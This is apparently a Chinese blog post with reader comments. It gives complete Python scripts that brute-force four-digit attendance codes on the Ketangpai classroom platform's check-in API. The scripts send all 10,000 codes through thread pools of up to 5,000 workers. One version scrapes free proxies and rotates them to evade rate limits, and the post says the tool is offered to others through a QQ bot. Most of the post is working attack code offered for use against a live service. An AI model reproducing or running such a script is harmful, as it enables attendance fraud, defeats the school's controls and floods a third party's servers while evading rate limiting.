使用爬虫技术模拟数字考勤进行暴力破解考勤码
文章目录
思路
由于暴力破解考勤码速率受限,做出如下修改
session
- 使用
Session
对象能够保持连接,requests保持连接从而减少频繁进行 TCP 三次握手的时间消耗。
多线程
- 使用多线程开了2000个线程的线程池
try: if(post_sign_in(0000)==1): input() sys.exit() else: print("正在暴力破解考勤,请稍后") #code=input("请输入考勤码:") # code=input("请输入考勤码:") # 创建线程池 with ThreadPoolExecutor(2000) as t: for code in range(0, 9999): code = '%04d' % code t.submit(post_sign_in, code=code) # 等待全部执行
- 首先爬取大量ip并验证可通后写入ip.txt文件爬取ip函数如下
import requests from bs4 import BeautifulSoup import re import time ip = [] port = [] type = [] def get_url(page): for i in range(int(page)): try: print('正在爬取第%d页'%(i+1)) url = 'https://www.kuaidaili.com/free/inha/{}/'.format(i+1) print("爬取网址为:",url) IP1,PORT1,TYPE1=get_content(url) # print(IP1) # print(PORT1) # print(TYPE1) process_data(IP1,PORT1,TYPE1) print('休息一下') time.sleep(3)#防止访问频率过快,被封 except Exception as e: print('爬取失败',e) def get_content(url): headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'} response = requests.get(url,headers=headers) if response.status_code == 200: print('连接正常') soup = BeautifulSoup(response.text,'lxml') contents = soup.find_all('td') IP = [] PORT = [] TYPE = [] for content in contents: content = str(content) if re.findall(r'[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*',content): IP.append(re.findall(r'[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*',content)) elif re.findall(r'<td data-title="PORT">',content): PORT.append(re.findall(r'\d+',content)) elif re.findall(r'<td data-title="类型">',content): TYPE.append(re.findall('[A-Z]{4,5}',content)) return IP,PORT,TYPE else: print('连接失败或遭遇反爬') def process_data(IP,PORT,TYPE): for content in IP: ip.append(content[0]) for content in PORT: port.append(content[0]) for content in TYPE: type.append(content[0]) reg = [] for i in range(len(ip)): dic ={} dic[type[i]] = ip[i]+':'+port[i] reg.append(dic) can_use = check_ip(reg) print('有用的ip数量为:',len(can_use)) save_ip(can_use) def check_ip(reg): url = 'https://www.baidu.com/' headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'} can_use = [] for i in reg: response = requests.get(url,headers,proxies = i,timeout = 1) if response.status_code == 200: can_use.append(i) return can_use def save_ip(data): with open('ip.txt','w+') as f: for i in data: f.write(str(i)+'\n') f.close() if __name__ == '__main__': page = input('爬取页数:') get_url(page) print('爬取完成') print("ip代理池搭建完成!!!")
#{'HTTP': '118.163.120.181:58837'} f = open("ip.txt") # 返回一个文件对象 line = f.readline() # 调用文件的 readline()方法 while line: keys = {} # 用来存储读取的顺序 #print(line,end="")# 在 Python 3中使用 v=line[1:-2].split(":") keys[v[0][1:-1]]=v[1][2:-1] #print(keys) proxy_list.append(keys) line = f.readline() #关键代码,随机获取一个代理ip proxy = choice(proxy_list) response = Session.post(url=url, headers=head, data=data,timeout=3000,proxies=proxy)
课堂派的爬取
1.课堂派的登陆
解析登陆界面,发现账号密码是明文登陆,没用使用js进行加密算法
- 获取token
#token为个人课堂派账号信息
def get_token():
url = "https://openapiv5.ketangpai.com//UserApi/login"
head={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"}
data={"email":username,"password":userpassword,"remember":"0","code":"","mobile":"","type":"login","reqtimestamp":1650284445501}
response=requests.post(url=url,headers=head,data=data)
token=response.json()['data']['token']
return token
token=get_token()
2.获取课程列表
通过json解析21-22年度所有课程列表,并从课表中获取对所有id
def get_courses():
url = "https://openapiv5.ketangpai.com//CourseApi/semesterCourseList"
head={ "token":token,
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"}
data={"isstudy":"1","search":"","semester":"2021-2022","term":"2","reqtimestamp":1650284447078}
response = requests.post(url=url, headers=head, data=data)
courselist = response.json()["data"]
allcourse = []
xuhao = 1
for i in courselist:
course = {"序号": xuhao, "name": i["coursename"], "id": i["id"]}
allcourse.append(course)
xuhao += 1
for i in allcourse:
print('序号:',str ({i['序号']})[1:-1].ljust(2),' \t课程名:',str ({i['name']})[2:-2].ljust(2))
return allcourse
3.获取需要考勤科目id
allcourse=get_courses()
yourchoice = int(input("请输入你要考勤的科目序号:"))
print(allcourse[yourchoice - 1])
courseid = allcourse[yourchoice - 1]["id"]
print("课程id:",courseid)
4.发送报文模拟考勤
通过sesson向服务器发送登陆请求对应报文(session可以起到加速作用,因为session会话对象可以跨请求保持某些参数)
url="https://openapiv5.ketangpai.com/AttenceApi/checkin"
head={
"token":token,
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"
}
Session = requests.session()
flag=0
def post_sign_in(code):
data={
"id":idd,
"code":code,
"unusual":"",
"latitude":"",
"longitude":"",
"accuracy":"",
"appid":"",
"clienttype":"1",
"reqtimestamp":"1648101546"
}
response = Session.post(url=url, headers=head, data=data)
global message
message = response.json()['message']
# print(message)
if message=="考勤已经结束,无法再签到":
print("考勤已经结束!!!")
flag=1
return flag
elif message=="访问成功":
print(code,"已经签到成功!!!!!!!!!!!!!!!!!!!!签到码是:",code)
elif message=="考勤码不正确,请重新输入":
#print(code,"考勤码不正确")
pass
else:
print(code,"签到成功!!!签到码为:",code)
flag=2
return flag
5.获取选择考勤科目的最新一次考勤信息
def get_attence():
urla="https://openapiv5.ketangpai.com/SummaryApi/attence"
da={
"courseid":courseid,#为课程号
"page":"1",
"reqtimestamp":time.time(),
"size":"10"
}
res=requests.post(url=urla,headers=head,data=da)
con=res.json()
#print(con['data']['data'][0]['id'])
return con['data']['data'][0]['id']
6.最后暴力破解考勤码(其中使用了多线程以加速请求速度)
if __name__ == '__main__':
try:
idd=get_attence()
except Exception as result_:
print("该门课程暂无发布考勤信息!!!")
input()
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))#打印本地时间
try:
if(post_sign_in(0000)==1):
input()
sys.exit()
else:
print("正在暴力破解考勤,请稍后")
#code=input("请输入考勤码:")
for code in range(0,9999):
code = '%04d' % code
t = threading.Thread(target=post_sign_in, kwargs = {"code": code})
t.start()
except Exception as restlt:
if(restlt=="name 'idd' is not defined"):
print("该门课程暂无发布考勤信息!!!")
print(restlt)
所有代码
非ip代理版本
# -*- coding:utf-8 -*-
import os
import sys
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from getpass import getpass
import requests
import urllib3
requests.packages.urllib3.disable_warnings()
urllib3.disable_warnings()
username=input("请输入你的课堂派账号:")
#userpassword=getpass("请输入你的课堂派密码:")
userpassword=input("请输入你的课堂派密码:")
#token为个人课堂派账号信息
def get_token():
url = "https://openapiv5.ketangpai.com//UserApi/login"
head={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"}
data={"email":username,"password":userpassword,"remember":"0","code":"","mobile":"","type":"login","reqtimestamp":1650284445501}
response=requests.post(url=url,headers=head,data=data)
token=response.json()['data']['token']
return token
token=get_token()
#获取所有课程列表
def get_courses():
url = "https://openapiv5.ketangpai.com//CourseApi/semesterCourseList"
head={ "token":token,
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"}
data={"isstudy":"1","search":"","semester":"2021-2022","term":"2","reqtimestamp":1650284447078}
response = requests.post(url=url, headers=head, data=data)
courselist = response.json()["data"]
allcourse = []
xuhao = 1
for i in courselist:
course = {"序号": xuhao, "name": i["coursename"], "id": i["id"]}
allcourse.append(course)
xuhao += 1
for i in allcourse:
print('序号:',str ({i['序号']})[1:-1].ljust(2),' \t课程名:',str ({i['name']})[2:-2].ljust(2))
return allcourse
allcourse=get_courses()
yourchoice = int(input("请输入你要考勤的科目序号:"))
print(allcourse[yourchoice - 1])
courseid = allcourse[yourchoice - 1]["id"]
print("课程id:",courseid)
url="https://openapiv5.ketangpai.com/AttenceApi/checkin"
head={
"token":token,
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"
}
requests.DEFAULT_RETRIES = 5 # 增加重试连接次数
Session = requests.session()
Session.keep_alive = False
flag=0
def get_attence():
urla="https://openapiv5.ketangpai.com/SummaryApi/attence"
da={
"courseid":courseid,#为课程号
"page":"1",
"reqtimestamp":time.time(),
"size":"10"
}
res=requests.post(url=urla,headers=head,data=da)
con=res.json()
print("创建时间:",time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(int(con['data']['data'][0]['createtime']))))
return con['data']['data'][0]['id']
idd=get_attence()
def post_sign_in(code):
data={
"id":idd,
"code":code,
"unusual":"",
"latitude":"",
"longitude":"",
"accuracy":"",
"appid":"",
"clienttype":"1",
"reqtimestamp":"1648101546"
}
response = Session.post(url=url, headers=head, data=data,verify=False,timeout=15)
global message
message = response.json()['message']
# print(message)
if message=="考勤已经结束,无法再签到":
print("考勤已经结束!!!")
flag=1
return flag
elif message=="访问成功":
print(code,"签到成功!!!签到码为:",code)
elif message=="考勤码不正确,请重新输入":
#print(code,"考勤码不正确",code)
pass
else:
print(code,"签到成功!!!签到码为:",code)
flag=2
return flag
if __name__ == '__main__':
try:
idd=get_attence()
except Exception as result_:
print("该门课程暂无发布考勤信息!!!")
input()
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))#打印本地时间
try:
if(post_sign_in(0000)==1):
input()
sys.exit()
else:
print("正在暴力破解考勤,请稍后")
# code=input("请输入考勤码:")
# 创建线程池
with ThreadPoolExecutor(2000) as t:
for code in range(0, 9999):
code = '%04d' % code
t.submit(post_sign_in, code=code)
# 等待全部执行
except Exception as restlt:
if(restlt=="name 'idd' is not defined"):
print("该门课程暂无发布考勤信息!!!")
print(restlt)
ip代理版本
# -*- coding:utf-8 -*-
import os
import sys
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from getpass import getpass
from random import choice
import requests
import urllib3
requests.packages.urllib3.disable_warnings()
urllib3.disable_warnings()
proxy_list=[]
f = open("ip.txt") # 返回一个文件对象
line = f.readline() # 调用文件的 readline()方法
#{'HTTP': '118.163.120.181:58837'}
while line:
keys = {} # 用来存储读取的顺序
#print(line,end="")# 在 Python 3中使用
v=line[1:-2].split(":")
keys[v[0][1:-1]]=v[1][2:-1]
#print(keys)
proxy_list.append(keys)
line = f.readline()
#print(proxy_list)
f.close()
username=input("请输入你的课堂派账号:")
#userpassword=getpass("请输入你的课堂派密码:")
userpassword=input("请输入你的课堂派密码:")
#token为个人课堂派账号信息
def get_token():
url = "https://openapiv5.ketangpai.com//UserApi/login"
head={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"}
data={"email":username,"password":userpassword,"remember":"0","code":"","mobile":"","type":"login","reqtimestamp":1650284445501}
response=requests.post(url=url,headers=head,data=data)
token=response.json()['data']['token']
return token
token=get_token()
#获取所有课程列表
def get_courses():
url = "https://openapiv5.ketangpai.com//CourseApi/semesterCourseList"
head={ "token":token,
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"}
data={"isstudy":"1","search":"","semester":"2021-2022","term":"2","reqtimestamp":1650284447078}
response = requests.post(url=url, headers=head, data=data)
courselist = response.json()["data"]
allcourse = []
xuhao = 1
for i in courselist:
course = {"序号": xuhao, "name": i["coursename"], "id": i["id"]}
allcourse.append(course)
xuhao += 1
for i in allcourse:
print('序号:',str ({i['序号']})[1:-1].ljust(2),' \t课程名:',str ({i['name']})[2:-2].ljust(2))
return allcourse
allcourse=get_courses()
yourchoice = int(input("请输入你要考勤的科目序号:"))
print(allcourse[yourchoice - 1])
courseid = allcourse[yourchoice - 1]["id"]
print("课程id:",courseid)
url="https://openapiv5.ketangpai.com/AttenceApi/checkin"
head={
'Connection':'close',
"token":token,
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"
}
requests.DEFAULT_RETRIES = 5 # 增加重试连接次数
Session = requests.session()
Session.keep_alive = False
flag=0
def get_attence():
urla="https://openapiv5.ketangpai.com/SummaryApi/attence"
da={
"courseid":courseid,#为课程号
"page":"1",
"reqtimestamp":time.time(),
"size":"10"
}
res=requests.post(url=urla,headers=head,data=da)
con=res.json()
#print(con['data']['data'][0]['id'])
return con['data']['data'][1]['id']
idd=get_attence()
def post_sign_in(code):
Session.keep_alive = False
data={
"id":idd,
"code":code,
"unusual":"",
"latitude":"",
"longitude":"",
"accuracy":"",
"appid":"",
"clienttype":"1",
"reqtimestamp":"1648101546"
}
proxy = choice(proxy_list)
response = Session.post(url=url, headers=head, data=data, timeout=15, proxies=proxy,verify=False)
global message
message = response.json()['message']
# print(message)
if message=="考勤已经结束,无法再签到":
print("考勤已经结束!!!")
flag=1
return flag
elif message=="访问成功":
print(code,"签到成功!!!签到码为:",code)
elif message=="考勤码不正确,请重新输入":
pass
else:
print(code,"签到成功!!!签到码为:",code)
flag=2
return flag
if __name__ == '__main__':
try:
idd=get_attence()
except Exception as result_:
print("该门课程暂无发布考勤信息!!!")
input()
print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))#打印本地时间
try:
if(post_sign_in(0000)==1):
input()
sys.exit()
else:
print("正在暴力破解考勤,请稍后")
#code=input("请输入考勤码:")
# code=input("请输入考勤码:")
# 创建线程池
with ThreadPoolExecutor(5000) as t:
for code in range(0, 9999):
code = '%04d' % code
t.submit(post_sign_in, code=code)
# 等待全部执行
except Exception as restlt:
if(restlt=="name 'idd' is not defined"):
print("该门课程暂无发布考勤信息!!!")
#print(restlt)
使用
本代码已使用pyinstall -f
编译为可执行文件
并将其部署到qq机器人上。机器人接口账号为382152588
使用可直接运行python程序或者运行可执行exe文件或者使用接口qq机器人账号对其发送 “考勤” 关键字
2023-03-09更新
更新内容-提升速度,修复bug,增添代码可读性,健壮性
# -*- coding:utf-8 -*-
import logging
import time
import requests
from tornado import concurrent
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s: %(message)s",
datefmt="%Y-%m-%d %H:%M:%S"
)
#该处输入账户密码
username=input("请输入你的课堂派账号:")
userpassword=input("请输入你的课堂派密码:")
#判断是否要关闭所有线程
result = 0
#模拟登录获取token,token为个人课堂派账号信息
def get_token():
url = "https://openapiv5.ketangpai.com//UserApi/login"
head={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"}
data={"email":username,"password":userpassword,"remember":"0","code":"","mobile":"","type":"login","reqtimestamp":time.time()}
response=requests.post(url=url,headers=head,data=data)
token=response.json()['data']['token']
return token
token=get_token()
print(token)
#获取所有课程列表
def get_all_courses(token):
url = "https://openapiv5.ketangpai.com//CourseApi/semesterCourseList"
headers = {
"token": token,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"
}
data = {
"isstudy": "1",
"search": "",
"semester": "2022-2023",
"term": "2",
"reqtimestamp": time.time()
}
response = requests.post(url=url, headers=headers, data=data)
if response.ok:
courselist = response.json()["data"]
allcourse = [{"序号": i+1, "name": c["coursename"], "id": c["id"]} for i, c in enumerate(courselist)]
return allcourse
else:
print("请求失败:", response.status_code)
return None
def select_course(allcourse):
try:
yourchoice = int(input("请输入你要考勤的科目序号:"))
if not 1 <= yourchoice <= len(allcourse):
raise ValueError()
course = allcourse[yourchoice - 1]
print(f"你选择的课程是: {course['name']},课程ID是: {course['id']}")
return course
except ValueError:
print("输入有误,请重新输入")
return None
#模拟请求的请求头
url="https://openapiv5.ketangpai.com/AttenceApi/checkin"
head={
"token":token,
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Edg/99.0.1150.55"
}
session = requests.Session()
session.headers.update(head)
flag=0
#进行暴力模拟
def post_sign_in(code):
global result
data = {"id": attence_id, "code": code}
try:
response = session.post(url=url, data=data, timeout=3)
message = response.json()["message"]
if message == "考勤已经结束,无法再签到":
logging.warning(f"考勤已经结束!!! {code}")
result=1
return 1
elif message == "访问成功":
logging.info(f"签到成功!!!签到码为: {code}")
result=3
return 3
elif message == "考勤码不正确,请重新输入":
logging.warning(f"考勤码不正确 {code}")
return 2
else:
logging.error(f"未知错误 {code}")
return 2
except requests.exceptions.RequestException:
logging.error(f"网络请求出错 {code}")
return 2
def get_attence(courseid):
urla = "https://openapiv5.ketangpai.com/SummaryApi/attence"
data = {
"courseid": courseid, # 为课程号
"page": "1",
"reqtimestamp": time.time(),
"size": "10"
}
response = session.post(url=urla, data=data, timeout=10)
attence_id = response.json()["data"]["data"][0]["id"]
title = response.json()["data"]["data"][0]["title"]
logging.info(f"获取考勤信息成功,考勤标题为: {title}")
return attence_id
if __name__ == '__main__':
#获取所有课程列表
allcourse = get_all_courses(token)
#选择对应课程,获得课程id
for course in allcourse:
print(course)
if allcourse:
selected_course = select_course(allcourse)
if selected_course:
courseid = selected_course["id"]
#获取课程id中最近一次考勤的id
attence_id = get_attence(courseid)
#开100个线程池
executor = concurrent.futures.ThreadPoolExecutor(max_workers=100)
codes = [f"{code:04d}" for code in range(10000)]
with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
for result in executor.map(post_sign_in, codes):
if result == 3:#签到成功
break
if result == 3:
print("All threads stopped")
微信赞赏 支付宝赞赏
所以怎么使用?看不懂啊
python运行代码直接就行,需要一丢丢python基础
博主,这个报错怎么处理:line 121, in
attence_id = get_attence(courseid)
^^^^^^^^
NameError: name ‘courseid’ is not defined
debug一下,我这好像没有这个问题,应该是courseid这个没定义